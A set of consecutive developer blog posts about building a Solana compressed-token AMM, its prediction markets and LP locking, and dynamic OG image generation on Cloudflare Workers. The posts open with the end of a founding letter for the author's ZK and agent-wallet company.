## Leg two: Solana stopped being a gas-fee story

I came up at ConsenSys. I love the EVM the way you love a complicated relative — deeply, suspiciously, with a lot of patience. But the EVM was not designed for a world in which a privacy-preserving deposit costs you a single-digit number of cents and a transfer costs less. The EVM was designed for a world in which compute is precious and you charge by the opcode.

Solana is the opposite design point. Compute is cheap, throughput is high, parallelism is the default, and — critically — Light Protocol's compressed-token primitive lets you push almost the entire account state of a token into an off-chain Merkle tree. The savings are not marginal. They are something like 5000× per token. I spent a weekend porting a notional AMM to Solana for the first time and the gas numbers came out so low I assumed I had a math error. I did not. The chain is just that much cheaper.

I wrote about the implications in [ZeraSwap: An AMM for Compressed Tokens](/blog/zeraswap_compressed_amm/). The short version: when the per-account-state cost of a token drops by three and a half orders of magnitude, every assumption you had about the *granularity* of tokenisation has to be re-examined. You can have one token per medical record. One token per receipt. One token per proof. The cost of "putting it on chain" stops being a budgeting decision and starts being a *naming* decision.

ZK is the privacy half. Compressed tokens are the bandwidth half. If you have both, you have the substrate I would have wanted for [the cryptocurrency we should have built](/blog/a_better_crypto/).
## Leg three: AI agents need verifiable money

This is the leg that tipped me from "interesting hobby" to "I'm doing this full-time." It's also the leg most people get wrong, so I want to walk it carefully.

If you have not played with the Model Context Protocol yet, the elevator version is: an AI agent (Claude, Cursor, Cline, your custom thing) connects to a *server* that exposes tools the agent can call. The server might be a calendar. The server might be a database. The server might be — and here is where it gets interesting — a wallet.

In 2025 a lot of teams glued LLMs to wallets and discovered, predictably, that the result was funny but not safe. Funny because LLMs are very confident; not safe because wallets, being unverified pieces of state, can be lied to in ways the model has no way to verify. The result was a small wave of "agent steals the demo wallet's testnet ETH" videos that everyone enjoyed and then forgot about.

The fix isn't smaller models or more guardrails. The fix is **verifiable cryptographic state**. If the agent asks the server "do I have the right to spend this note?", the server should be able to produce a proof that the agent can verify *locally*, with the same trust model the chain itself uses. Not a screenshot. Not an oracle. A Groth16 proof that the agent's runtime checks against the same verifying key the chain holds.

This is the reason `@zera-labs/mcp-server` exists, and it's the reason it shipped on the [first day](/blog/zera_sdk_scaffolding/) of the SDK rather than as a v2 feature. If agents are going to interact with money — and the rate at which the next generation of agentic products is being shipped tells me they are — they need the same cryptographic verifiability that human users now expect from a wallet. The MCP layer is the agent's wallet. The SDK below it is the cryptographic verifiability. The chain underneath is the settlement.

You don't have to believe the agent thesis is going to be huge.
You only have to believe it isn't going to be zero. The MCP server is, on the day this letter ships, less than 500 lines of code. If the bet is wrong, I lose 500 lines of code. If it's right, the SDK ships into a market that is roughly 100× larger than the human-wallet market.

## Why a company instead of more posts

People who have read me for a while know I do most of my thinking out loud, in writing, on this blog. There's an obvious version of all the above that's just *more posts about it*. Why a whole company.

Two reasons. First: the surface area is larger than one person. The SDK alone is a Rust crate, a Neon binding, a TypeScript SDK, a prover, an MCP server, three transaction builders, a Surfpool devnet, a 144-test Vitest suite, and a documentation surface. The wallet is its own product. The AMM is its own product. The medical demo is its own product. The design system is its own product. I cannot ship that on weekends. Nobody can.

Second: the work is more credible inside a company. When the SDK lands an audit, that audit lands on Zera Labs, not on "some guy with a blog." When the first integration partner asks who's accountable if the prover regresses, the answer is "Zera Labs," not "I'll get to it Tuesday." When a customer asks for a SOC 2, the answer is "we're working on it" instead of laughter. The legal and operational scaffolding is part of the product.

I want to be clear about what I'm *not* claiming. I'm not claiming the team is huge. I'm not claiming we've raised a round. I'm not claiming we have customers I can name. I am claiming we have a working SDK, a working wallet, a working AMM, a working medical demo, a working devnet, and a Design System we use across the company. The rest is sequencing.

## The animating principle

Every company has one sentence that explains what it is willing to be embarrassed about and what it is willing to be loud about.
The one I keep coming back to for Zera Labs is:

> *We build cryptographic infrastructure that is fast enough, cheap enough, and verifiable enough to leave the laboratory. Everything else is taste.*

"Fast enough" is the ZK leg. "Cheap enough" is the Solana / compressed-token leg. "Verifiable enough" is the agentic leg. "Everything else is taste" means the design system, the documentation, the tone of the blog, the choice of dependencies, the way we write commit messages, the way we run incident response. None of those things are in the trade-off space. They are the part where the company has to be the company.

If any of the three legs of the tripod were missing, this would be a research lab or a side project. All three are present. The thing to do, then, is to ship.

## Where to next

If you want the technical receipts:

- [Building the Zera SDK: Day One](/blog/zera_sdk_scaffolding/) — the 14-minute session that put the foundation in.
- [144 Tests and a Surfpool Devnet](/blog/zera_sdk_test_suite/) — the bridge from "the code exists" to "you can use it."
- [ZeraSwap: An AMM for Compressed Tokens](/blog/zeraswap_compressed_amm/) — the bandwidth half.
- [Zera Wallet v3](/blog/zera_wallet_v3_zkp/) — the user-facing half.
- [ZK-FHIR](/blog/zera_med_zk_fhir/) — the proof we can do this for things other than money.

If you want the personal receipts: [Nuclear reactors taught me to ship software](/blog/nuclear_reactors_taught_me_to_ship/) and [What running a Bitcoin mine taught me about cloud margins](/blog/what_running_a_bitcoin_mine_taught_me/) are the two prior chapters. This one is chapter three.

If you want to *use* the work — `dax@skill-issue.dev`. The calendar's [here](https://cal.com/daxts).

That's the founding letter. Now I have to go ship the next thing.
---

# Prediction Markets, LP Locks, and an Admin Page That Doesn’t Suck

Canonical: https://blog.skill-issue.dev/blog/prediction_markets_admin/
Description: How I bolted CPMM prediction markets onto ZeraSwap, locked LP for graduated tokens, and built a 5-tab admin panel before the first malicious actor showed up.
Published: 2026-02-18T19:31:55.000Z
Tags: zera, solana, anchor, prediction-markets, cpmm, admin, governance

A week after [the AMM shipped](/blog/zeraswap_compressed_amm/) I had two open feature requests from people who were actually using it:

1. "I want to bet on whether $TOKEN graduates by Friday."
2. "Why doesn't the launchpad lock LP after graduation? You're going to get rugged."

Both fair. Both were addressed in [`16aa30d` — `Add prediction markets, LP locking, graduation flow, comprehensive admin, and USD pricing`](https://github.com/Dax911/z_trade/commit/16aa30d3ed2f552f743886a647ba1fc7f4773aed) on 2026-02-18. 55 files changed. Let's unpack the parts that actually matter.

## Prediction markets as a CPMM

A prediction market is just a CPMM with two outcome reserves instead of a token + SOL pair. From [`sdk/src/prediction_math.ts`](https://github.com/Dax911/z_trade/blob/16aa30d3ed2f552f743886a647ba1fc7f4773aed/sdk/src/prediction_math.ts):

```ts
// CPMM: shares_out = outcome_reserves * sol_after_fee
//                  / (other_reserves + sol_after_fee)
export function calcBuyOutcome(
  solIn: bigint,
  yesReserves: bigint,
  noReserves: bigint,
  outcome: "yes" | "no",
  feeBps: bigint,
): { sharesOut: bigint; fee: bigint } {
  const fee = (solIn * feeBps) / BPS_DENOMINATOR;
  const solAfterFee = solIn - fee;
  const outcomeReserves = outcome === "yes" ? yesReserves : noReserves;
  const otherReserves = outcome === "yes" ? noReserves : yesReserves;
  if (outcomeReserves === 0n) return { sharesOut: 0n, fee };
  const sharesOut =
    (outcomeReserves * solAfterFee) / (otherReserves + solAfterFee);
  return { sharesOut, fee };
}

// YES price = no_reserves / (yes_reserves + no_reserves)
export function calcOutcomePrice(yesReserves, noReserves) {
  const total = yesReserves + noReserves;
  if (total === 0n) return { yesPrice: 0.5, noPrice: 0.5 };
  // ...
}
```

The trick is the *price*. In a YES/NO CPMM the price of YES is just the ratio of NO reserves to total reserves. That's because if YES is "expensive" (lots of YES shares already sold), there's less YES reserve left, and the next dollar buys you fewer YES shares. The math is symmetric.

I picked CPMM over LMSR because:

- The LP doesn't need to subsidize liquidity. Whoever creates the market puts up real SOL on both sides and earns the fees.
- It uses literally the same `x*y=k` engine as ZeraSwap's swap path, so I could reuse the slippage and `MathOverflow` checks I'd already debugged.
- Resolution is a single instruction that drains the losing side into the protocol and pays out the winning side proportionally.

Six instructions on-chain: `create_market`, `buy_outcome`, `sell_outcome`, `resolve_market`, `claim_winnings`, `void_market` (plus protocol fee collection). The void path is the safety valve — if the resolution oracle disappears or the market becomes ambiguous, the admin can void and refund pro-rata.

## LP locking: the part that actually makes graduation safe

Before this commit, when a launchpad token graduated to a real ZeraSwap pool, the LP tokens were minted to the launchpad authority and that was that. Nothing stopped the launch creator from yanking liquidity 30 seconds later. Classic rug.

The fix is `LpLock` PDA + `lock_liquidity` and `extend_lock` instructions, and a check in `remove_liquidity` that consults the lock state. Now graduation locks the launch's LP for a configurable window.
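One plausible shape for that `remove_liquidity` check, sketched in TypeScript rather than the actual Anchor constraint. The field names and the partial-unlock policy are assumptions for illustration, not the program's verbatim logic:

```typescript
// Hypothetical mirror of the on-chain LpLock check. The real version is a
// constraint inside the Anchor remove_liquidity instruction.
interface LpLock {
  pool: string;            // pool this lock applies to
  lockedAmount: bigint;    // LP tokens under lock
  unlockTimestamp: number; // unix seconds when the lock expires
}

function assertCanRemove(
  lock: LpLock | null,
  lpToBurn: bigint,
  lpBalance: bigint,
  nowUnix: number,
): void {
  // No lock, or lock expired: anything goes.
  if (lock === null || nowUnix >= lock.unlockTimestamp) return;
  // Assumed policy: only the portion of the balance above the locked
  // amount may be withdrawn early.
  const unlocked =
    lpBalance > lock.lockedAmount ? lpBalance - lock.lockedAmount : 0n;
  if (lpToBurn > unlocked) throw new Error("LpStillLocked");
}
```

`extend_lock` would then be the one-way ratchet: it may only move `unlockTimestamp` forward, never back.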
If you want to be a serious launch, you opt into a longer lock; the frontend surfaces the lock duration as a trust signal on the explore page.

I shipped a related quality-of-life thing the same day in [`a02f672` — `lower graduation to 50 SOL`](https://github.com/Dax911/z_trade/commit/a02f67287a25ef3ce76117d6d592337002cb99a9). 85 SOL was the original threshold and nobody could actually graduate a token at $15K worth of bonding-curve liquidity. 50 SOL turned out to be the floor where a real microcap launch could clear graduation.

## The 5-tab admin page

The same commit ships a five-tab admin panel: `Overview / Launchpad / AMM / Markets / Docs`. The reason this is its own thing is not vanity — it's that a Solana program with five separate config PDAs and three separate fee vaults *cannot be safely operated from a CLI*. You will misread a hex address. You will paste the wrong network. You will pause production thinking it's devnet.

Each tab carries:

- All three vault balances with USD denomination (SOL/USD pulled from CoinGecko via `SolPriceContext` polling).
- "Initialize PDA" buttons for any config that hasn't been bootstrapped on the current cluster.
- Per-launch / pool / market fee collection, plus a "collect all" bulk button.
- The void-market button on the prediction tab, behind a confirm modal, because the void path is irreversible.

I ended up needing this faster than I expected. The very next day I shipped [`557d314` — `Add migrate_config instruction for safe account resizing`](https://github.com/Dax911/z_trade/commit/557d314bd4c9d045823dbd8e6301742338f14ca6) and [`f673b22` — `Add config migration UI to admin page`](https://github.com/Dax911/z_trade/commit/f673b226a34dff77a35ccaf0db1c064112b528fb). The trigger: I'd added a `min_market_liquidity` field to `PredictionConfig` without bumping the account size, and existing configs on devnet couldn't take the update.
The admin page detected old-format accounts via a length comparison and surfaced a "Migrate Config" button. `migrate_config` does what its name says — resizes the account, copies the old data, writes the new field. The trick I missed the first time, fixed in [`6d044f7`](https://github.com/Dax911/z_trade/commit/6d044f7efcb3c4debc36fa33d68518748ed04158): when growing a PDA you have to fund the lamport difference via a System Program CPI transfer, not by directly debiting the user's lamports inside the program. Anchor will let you write the second one. The runtime will reject it. Welcome to Solana.

## Trade-offs

**Why CPMM and not parimutuel pools?** Because parimutuel doesn't give you a price until resolution. CPMM lets traders see "YES is at 67¢" continuously. That's the entire UX of a prediction market. If you can't show a price, your users are going to ask why they shouldn't just use Polymarket.

**Why void-market behind admin only?** Because the alternative is "anybody can vote to void a market they're losing" and that destroys the incentive to make confident bets. The market creator stakes the liquidity; the protocol admin holds the void key. The doc tab on the admin panel makes that policy explicit.

**Why an admin page in a "decentralized" project?** Because the project isn't decentralized yet. I'm not going to pretend it is. The admin keys exist; they're documented; they will be migrated to a multisig, and eventually to TW-TVV-style governance ([described in the m0n3y origin post](/blog/m0n3y_naming_a_dream/)). Lying about that today doesn't make it true tomorrow.

## What this taught me

The smart-contract surface of a Solana product compounds non-linearly. ZeraSwap had three PDAs and one fee vault. Adding prediction markets and LP locks brought it to seven PDAs and three fee vaults. The cost of ad-hoc admin tooling exploded. The 5-tab admin page paid for itself in the first hour after deploy when I needed to bulk-collect fees from 12 launches.
## Further reading

- [The full prediction-markets commit](https://github.com/Dax911/z_trade/commit/16aa30d3ed2f552f743886a647ba1fc7f4773aed)
- [`prediction_math.ts`](https://github.com/Dax911/z_trade/blob/16aa30d3ed2f552f743886a647ba1fc7f4773aed/sdk/src/prediction_math.ts)
- [`migrate_config` instruction (the safe-resize fix)](https://github.com/Dax911/z_trade/commit/6d044f7efcb3c4debc36fa33d68518748ed04158)
- [Polymarket](https://polymarket.com/) — the UX target nobody on Solana matches yet
- [LMSR vs CPMM market makers](https://www.eecs.harvard.edu/cs286r/courses/fall12/papers/Hanson_LMSR.pdf) — the paper that justifies LMSR for thin markets

---

# Five Commits to Get an OG Image Out of a Cloudflare Worker

Canonical: https://blog.skill-issue.dev/blog/og_pngs_cf_workers/
Description: A 24-minute slog where I got dynamic OG PNG generation to work on Cloudflare Pages Functions. The bug is WebAssembly. The fix is a build-time WASM import.
Published: 2026-02-15T17:14:55.000Z
Tags: cloudflare, workers, wasm, og-image, svg, solana, devops

The OG image is the thing that decides whether your link gets clicked on Twitter, Discord, or Telegram. If you ship a Solana DEX without per-token OG images, your share buttons are wallpaper. If you ship them as SVG, half the social platforms render them as blank cards because half the social platforms don't render SVG. So you ship them as PNG. Which means you generate them on the edge. Which means you call into WebAssembly from a Cloudflare Pages Function. Which means [you bang your head against the wall five commits in a row](https://github.com/Dax911/z_trade/commits/main/?after=cb14990c6fadb4abe5e111cd716b3bd08a528ae9+47).

This post is a real-time receipt of that head-banging from 2026-02-15 between 17:03 and 17:30 UTC.
## The problem

The function in question lived at [`functions/og/default.ts`](https://github.com/Dax911/z_trade/blob/962d55c629ce56324bf9cef135d5aeac76f4c2d9/functions/og/default.ts) — a Cloudflare Pages Function that takes a token mint, builds a stylized SVG card with live AMM stats, and converts it to a PNG with [`svg2png-wasm`](https://www.npmjs.com/package/svg2png-wasm). The conversion is the hard part. Everything else is sed-replacing tokens into a template string.

The naive thing is what I shipped first in [1bac3bb — `Convert OG images from SVG to PNG`](https://github.com/Dax911/z_trade/commit/1bac3bbc1173ddf95a964c394858ca7192ce28ac):

```ts
import { initialize, createSvg2png } from "svg2png-wasm";

const wasmRes = await fetch(WASM_URL);
const wasm = await wasmRes.arrayBuffer();
await initialize(wasm);
```

This works locally. This works on Vercel. This does not work on Cloudflare Workers.

## Stage 1: dynamic import → static import (17:03)

[81d3f16 — `Fix OG PNG: use static import for svg2png-wasm instead of dynamic import`](https://github.com/Dax911/z_trade/commit/81d3f16e965ef683dc48c1bb748852c7fcca112c). CF's bundler doesn't bundle dynamic imports the same way it bundles static imports. Static import. Move on.

## Stage 2: self-fetch → unpkg (17:06)

[e2b0c76 — `Fix OG PNG: fetch WASM from unpkg CDN instead of self-fetch`](https://github.com/Dax911/z_trade/commit/e2b0c76a5e9dea8a425b768fe196a28315d16fa7). I had been serving the `.wasm` file from `app/public/` and fetching it via `fetch(env.url + "/svg2png_wasm_bg.wasm")`. CF Workers cannot fetch from themselves the way Node servers can — the request loops or 503s depending on the moon phase. I switched to unpkg's CDN. That worked, but introduced a runtime dependency on a third party. We come back to that.

## Stage 3: see the actual error (17:09)

[102f485 — `debug: show OG PNG error details instead of silent fallback`](https://github.com/Dax911/z_trade/commit/102f48575a2bb7cd6fc8e08013d1a6c43cb1f117).
Two hours into a deploy fight and you realize you've been catching the error and rendering the SVG fallback. Take the catch out. Suffer. The error: `WebAssembly.instantiate() of bytes from request body is not allowed in this Worker`.

CF Workers block `WebAssembly.instantiate()` from raw bytes. Not deprecated. Not slow. Just *blocked*. They want you to use a build-time `import` so the WASM binary becomes a real module they can compile during deploy, not at runtime in your handler. This is a real security stance — they don't want Worker code instantiating arbitrary blobs at runtime — but it's not great when your library (`svg2png-wasm`) is built around a fetch-and-init pattern.

## Stage 4: build-time WASM import (17:12)

[962d55c — `Fix OG PNG: use build-time WASM import for CF Workers compatibility`](https://github.com/Dax911/z_trade/commit/962d55c629ce56324bf9cef135d5aeac76f4c2d9). This is the actual fix:

```ts
// @ts-ignore — CF Workers WASM import (compiled at build time)
import wasmModule from "./svg2png.wasm";

let svg2pngConverter: Svg2png | null = null;
let initPromise: Promise<void> | null = null;

async function ensureSvg2png(): Promise<Svg2png> {
  if (svg2pngConverter) return svg2pngConverter;
  if (!initPromise) {
    initPromise = (async () => {
      await initialize(wasmModule);
      svg2pngConverter = createSvg2png();
    })();
  }
  await initPromise;
  return svg2pngConverter!;
}
```

You commit `svg2png.wasm` (~2MB) inside the Functions directory. CF picks it up at deploy time, treats it as a Worker-managed module, and binds the import to a real `WebAssembly.Module`. `initialize(wasmModule)` then takes a `Module` instead of bytes, which is the pre-compiled path that CF allows.

## Stage 5: directory math (17:14)

[9ccab18 — `Fix WASM import path`](https://github.com/Dax911/z_trade/commit/9ccab18e0f7f52d23feadbcac0d8033031c6e848). The per-token endpoint lives at `functions/og/token/[mint].ts`. The wasm I committed lives at `functions/og/svg2png.wasm`. The relative import was wrong. `../svg2png.wasm`. Done.
## Stage 6: fonts don't ship with the bundle (17:30)

[1c91af7 — `Fix OG images: register Inter + JetBrains Mono fonts for svg2png-wasm`](https://github.com/Dax911/z_trade/commit/1c91af7994df8330f75553a004a3819ce1def75e). Same idea. `svg2png-wasm` rasterizes text by looking up the font registered in its own runtime, not the host's. The OG card uses Inter and JetBrains Mono. If you don't `registerFont(await loadFontBytes())` for both before calling the converter, your text rasterizes as `□□□□`. Hilarious in test environments. Catastrophic on a public DEX.

## What this actually looked like deployed

The card is a `1200x630` SVG composed inline in TypeScript. The interesting part is the data fetch — I'm pulling live pool reserves from the cached market-data API I'd shipped one commit earlier in [5627d4d — `Add edge-cached market data API`](https://github.com/Dax911/z_trade/commit/5627d4d099cff09e708e01ae0a0c77248d714e5f), so the OG card always reflects the *current* price, capped to the cache TTL. That's the entire reason this had to live on the edge: a static image generated at build time would show stale prices forever.

## Trade-offs

**Why not use [`@vercel/og`](https://vercel.com/docs/functions/og-image-generation)?** Because we're on CF Pages, and Vercel's OG library is bound to React + Satori in a way that's genuinely hard to extract. `svg2png-wasm` is 4 dependencies and one WASM file. The cost of "just write the SVG yourself" turned out to be lower than I expected.

**Why commit the wasm file to git?** It's 2MB. My repo is not a museum. I'd rather have a deterministic deploy that doesn't depend on unpkg being up.

**Why not pre-render on cron and serve static PNGs?** Because there are 50+ tokens at any given moment, and pre-rendering all of them on a cron is busywork that wastes cycles 99.9% of the time. The right shape is "render on cache miss, serve from cache for 24h." Which is what shipped.
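The render-on-miss shape is worth seeing in code. A hedged sketch with a plain `Map` standing in for the platform cache, so the control flow runs anywhere (the deployed Function uses Cloudflare's cache, not this):

```typescript
// Generic render-on-miss cache with a TTL. The `render` callback is where
// the SVG build + svg2png conversion would go; a counter shows how rarely
// it actually fires.
const TTL_MS = 24 * 60 * 60 * 1000; // serve from cache for 24h

interface CacheEntry {
  png: Uint8Array;
  renderedAtMs: number;
}

function makeOgCache(render: (mint: string) => Uint8Array) {
  const store = new Map<string, CacheEntry>();
  let renders = 0; // instrumentation: how often we actually rasterize

  return {
    get(mint: string, nowMs: number): Uint8Array {
      const hit = store.get(mint);
      if (hit && nowMs - hit.renderedAtMs < TTL_MS) return hit.png; // hit
      renders += 1; // miss or expired: re-render and refresh the entry
      const png = render(mint);
      store.set(mint, { png, renderedAtMs: nowMs });
      return png;
    },
    rendersSoFar: () => renders,
  };
}
```

Fifty-plus tokens, one render each per day worst case — versus a cron that rasterizes everything whether anyone shares a link or not.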
## What this taught me

Cloudflare's WASM contract is *real* and you cannot work around it. The error message is clear once you stop swallowing it. The ecosystem of WASM libraries is mostly written assuming Node-style runtime fetch, so half of the porting work is going to be "convince this library to take a `WebAssembly.Module` instead of a `BufferSource`." Some libraries refuse to accept that as a PR; in those cases you write a thin wrapper or you fork.

Five commits in 24 minutes is not a flex. It's a confession that the only way I could solve this was to ship to production and let the runtime tell me what was wrong, because there is no other place that runs this stack the way Cloudflare does. CI didn't catch it. Local `wrangler pages dev` didn't catch it. Production caught it in 30 seconds.

## Further reading

- [Cloudflare Workers — WebAssembly modules](https://developers.cloudflare.com/workers/runtime-apis/webassembly/)
- [`svg2png-wasm` on npm](https://www.npmjs.com/package/svg2png-wasm)
- [The full sequence of commits on z_trade between 17:03–17:30 UTC](https://github.com/Dax911/z_trade/commits/main/?since=2026-02-15)
- [ZeraSwap origin post](/blog/zeraswap_compressed_amm/) — the project this OG card is for.

---

# ZeraSwap: An AMM for Compressed Tokens

Canonical: https://blog.skill-issue.dev/blog/zeraswap_compressed_amm/
Description: Initial commit of the first compressed-token AMM on Solana — Anchor program, x*y=k math, SOL/cToken pairs, and the cyberpunk launchpad UI that grew up around it.
Published: 2026-02-10T21:03:36.000Z
Tags: zera, solana, anchor, amm, light-protocol, compressed-tokens, rust

> "Initial ZeraSwap: compressed token AMM for Solana"

That's the [first commit on z_trade](https://github.com/Dax911/z_trade/commit/b088fe8bf3eb8c1047712abb53d865fd3ac93db3), dropped at 2026-02-10T21:03:36Z. It's also, as far as I'm aware, the first AMM where the token side of every pool is a Light Protocol compressed token instead of an SPL token.
That's not an accident; that's the entire pitch. Solana compressed tokens (`@lightprotocol/compressed-token`) cost roughly 1/5000th of SPL tokens to mint and transfer at scale, because the account state lives in a Merkle tree off-chain instead of a 165-byte SPL token account on-chain. That's incredible for token launches, terrible for AMMs — because every existing AMM expects to hold token accounts. So if you want compressed tokens to actually be useful as economic objects, you need an AMM that natively takes them.

## The Anchor program

Seven instructions. From [`programs/zeraswap/src/lib.rs`](https://github.com/Dax911/z_trade/blob/b088fe8bf3eb8c1047712abb53d865fd3ac93db3/programs/zeraswap/src/lib.rs):

```rust
#[program]
pub mod zeraswap {
    use super::*;

    pub fn initialize_protocol(ctx, fee_recipient, lp_fee_bps, protocol_fee_bps) -> Result<()> { ... }
    pub fn create_pool(ctx, initial_sol, initial_tokens) -> Result<()> { ... }
    pub fn add_liquidity(ctx, sol_amount, token_amount, min_lp_out) -> Result<()> { ... }
    pub fn remove_liquidity(ctx, lp_amount, min_sol_out, min_tokens_out) -> Result<()> { ... }
    pub fn swap_sol_for_tokens(ctx, sol_in, min_tokens_out) -> Result<()> { ... }
    pub fn swap_tokens_for_sol(ctx, tokens_in, min_sol_out) -> Result<()> { ... }
    pub fn collect_fees(ctx) -> Result<()> { ... }
}
```

Constants ([`constants.rs`](https://github.com/Dax911/z_trade/blob/b088fe8bf3eb8c1047712abb53d865fd3ac93db3/programs/zeraswap/src/constants.rs)):

```rust
pub const DEFAULT_LP_FEE_BPS: u16 = 20;       // 0.20%
pub const DEFAULT_PROTOCOL_FEE_BPS: u16 = 5;  // 0.05%
pub const MAX_FEE_BPS: u16 = 1000;            // 10% max total
pub const MINIMUM_LIQUIDITY: u64 = 1_000;     // locked forever on first deposit
pub const MINIMUM_SOL_RESERVES: u64 = 10_000; // 0.00001 SOL
```

The math is `x*y=k`, the same constant-product curve Uniswap v1 shipped in 2018. There's a reason every L1 AMM eventually defaults to this: its edge cases are all well known, so you don't discover new ones in production.
From [`instructions/swap.rs`](https://github.com/Dax911/z_trade/blob/b088fe8bf3eb8c1047712abb53d865fd3ac93db3/programs/zeraswap/src/instructions/swap.rs):

```rust
// Constant product:
// tokens_out = token_reserves * sol_in_after_fee
//            / (sol_reserves + sol_in_after_fee)
let tokens_out = (pool.token_reserves as u128)
    .checked_mul(sol_in_after_fee as u128)?
    .checked_div(
        (pool.sol_reserves as u128).checked_add(sol_in_after_fee as u128)?,
    )? as u64;

require!(tokens_out >= min_tokens_out, ZeraSwapError::SlippageExceeded);
require!(tokens_out < pool.token_reserves, ZeraSwapError::ReservesDrained);
```

I wrote it `u128`-promoted for the multiply, then cast back to `u64` after the divide, because `u64 * u64` overflows roughly the moment any pool gets serious volume. Nothing exciting; just the kind of detail that bites you exactly once.

## What's *actually* novel

The thing I had to figure out wasn't the curve. It was state trees. Each pool gets its own `state_tree: Pubkey` field in the [`Pool`](https://github.com/Dax911/z_trade/blob/b088fe8bf3eb8c1047712abb53d865fd3ac93db3/programs/zeraswap/src/state.rs) struct:

```rust
#[account]
pub struct Pool {
    pub token_mint: Pubkey,
    pub lp_mint: Pubkey,
    pub sol_vault: Pubkey,
    /// Dedicated state tree for this pool's compressed token operations
    pub state_tree: Pubkey,
    pub sol_reserves: u64,
    pub token_reserves: u64,
    pub lp_supply: u64,
    // ...
}
```

Light Protocol's compressed token operations need an explicit `state_tree` reference. If you forget that, the compress/decompress CPI just silently lands the tokens in someone else's tree, and your pool can never reconstruct them. Five days of staring at logs taught me to put `state_tree` directly on the `Pool` account at creation time and never touch it again.
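The same promotion trick is what any client-side quote helper has to mirror, with `bigint` playing the role of `u128`. A hedged sketch (not the SDK's actual export; names and the fee parameter are illustrative):

```typescript
// Constant-product quote mirroring the on-chain math: take the fee first,
// floor-divide like the program does, and enforce the same reserve invariant.
const BPS = 10_000n;

function quoteSolForTokens(
  solIn: bigint,
  solReserves: bigint,
  tokenReserves: bigint,
  totalFeeBps: bigint, // LP fee + protocol fee, e.g. 25n for 0.25%
): bigint {
  const solAfterFee = solIn - (solIn * totalFeeBps) / BPS;
  // tokens_out = token_reserves * sol_after_fee / (sol_reserves + sol_after_fee)
  const tokensOut =
    (tokenReserves * solAfterFee) / (solReserves + solAfterFee);
  if (tokensOut >= tokenReserves) throw new Error("ReservesDrained");
  return tokensOut;
}
```

Because `bigint` floor-divides exactly like the program's `checked_div`, a quote computed here matches the on-chain amount bit-for-bit, which is what makes `min_tokens_out` slippage bounds safe to derive client-side.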
## Five days later: the cyberpunk launchpad The next major commit is [b6b6fa5 — `Add shared AMM vault, launchpad, pools, transfers, cyberpunk UI`](https://github.com/Dax911/z_trade/commit/b6b6fa50c6f9678f69375067b33379d99feeff49) on 2026-02-15. This is where the AMM stopped being a barebones swap and started being a launchpad — bonding curves, internal `UserPosition.token_balance` accounting, a graduation flow at 50 SOL of bonding-curve liquidity, and the cyan/purple cyberpunk frontend that ended up being the project's identity. The launchpad is conceptually a separate Anchor program that buys/sells against a virtual reserve (think pump.fun) until a token "graduates" to a real ZeraSwap AMM pool. The curve uses a base reserve to bootstrap price discovery. From the same day, I shipped both [`f3f71f3` and `d01b4683`](https://github.com/Dax911/z_trade/commit/d01b4683d109af3dc58f48aaf7344d463700de55) lowering graduation from 85 → 50 SOL after the first paper trade made it obvious 85 was too high — nobody graduates a token if they need to spend $15K to do it. ## The quality-of-life shift The most under-appreciated commit of that February sprint is [cb14990 — `Fix RPC spam: pause polling on hidden tabs`](https://github.com/Dax911/z_trade/commit/cb14990c6fadb4abe5e111cd716b3bd08a528ae9). The whole repo had been making 46–94 RPC calls/min to Helius. New worst case after the fix: 12 calls/min on the active tab, 0 on hidden tabs. The hook is six lines of meaningful code: ```ts // app/src/hooks/useVisibleInterval.ts function onVisibilityChange() { if (document.hidden) { stop(); } else { savedCallback.current(); // fire immediately on re-show start(); } } document.addEventListener("visibilitychange", onVisibilityChange); ``` A free tier of Helius is 100k calls/day. A tab open for 24 hours at 94 calls/min burns through that in 18 hours. This bug was costing me real money. The fix shipped 12 days into the project. 
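The budget math behind that claim, as a quick sketch (the Helius numbers are the ones quoted above):

```typescript
// How many hours a fixed daily RPC call budget survives at a constant polling rate.
function hoursUntilExhausted(dailyBudget: number, callsPerMinute: number): number {
  return dailyBudget / (callsPerMinute * 60);
}
```

At the old worst case of 94 calls/min, the 100k/day free tier dies in about 17.7 hours, less than one forgotten tab-day. At the fixed 12 calls/min, the same budget lasts roughly 139 hours.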
## Trade-offs **Why not use an existing AMM SDK?** Because none of them know what to do with `@lightprotocol/compressed-token`. Orca, Raydium, Meteora — every one of them assumes SPL token accounts. By the time you've patched their account derivation, you've written your own program anyway. **Why x\*y=k instead of concentrated liquidity?** Because the AMM is a graduation target for the launchpad, not a yield-farming venue. The launch flow guarantees pools start with deep, balanced reserves. Concentrated liquidity in that environment is just a way to price-impact yourself. If somebody serious comes along and wants to bring real liquidity, they can fork the program; the math is 30 lines. **Why two fees (LP + protocol)?** Because I don't trust myself to skim the protocol fee out of LP revenue post-hoc. Putting the protocol fee on a separate counter from the start was cheap then and saved me a `migrate_config` ([`6d04415`](https://github.com/Dax911/z_trade/commit/6d044f7efcb3c4debc36fa33d68518748ed04158)) later — well, *almost* saved me. We'll get to that. ## What this taught me Compressed tokens are an unfair advantage for whoever ships first, because the entire DEX ecosystem on Solana is built on the assumption that "token" = "SPL Token Account." Light Protocol changed that assumption. The block of code most people miss is keeping a `state_tree` field on every pool — once you've done that, everything else is x\*y=k and being kind to your RPC provider. ## Further reading - [z_trade on GitHub](https://github.com/Dax911/z_trade) - [Initial ZeraSwap commit](https://github.com/Dax911/z_trade/commit/b088fe8bf3eb8c1047712abb53d865fd3ac93db3) - [Light Protocol — compressed tokens](https://www.lightprotocol.com/) - ["Building A Better Cryptocurrency"](/blog/a_better_crypto/) — the stance on protocol-level fee design that informed `MAX_FEE_BPS = 1000`. - [Stuck Sell, Post-Graduation](/blog/stuck_sell_post_grad/) — the bug this design eventually wrote me a check for. 
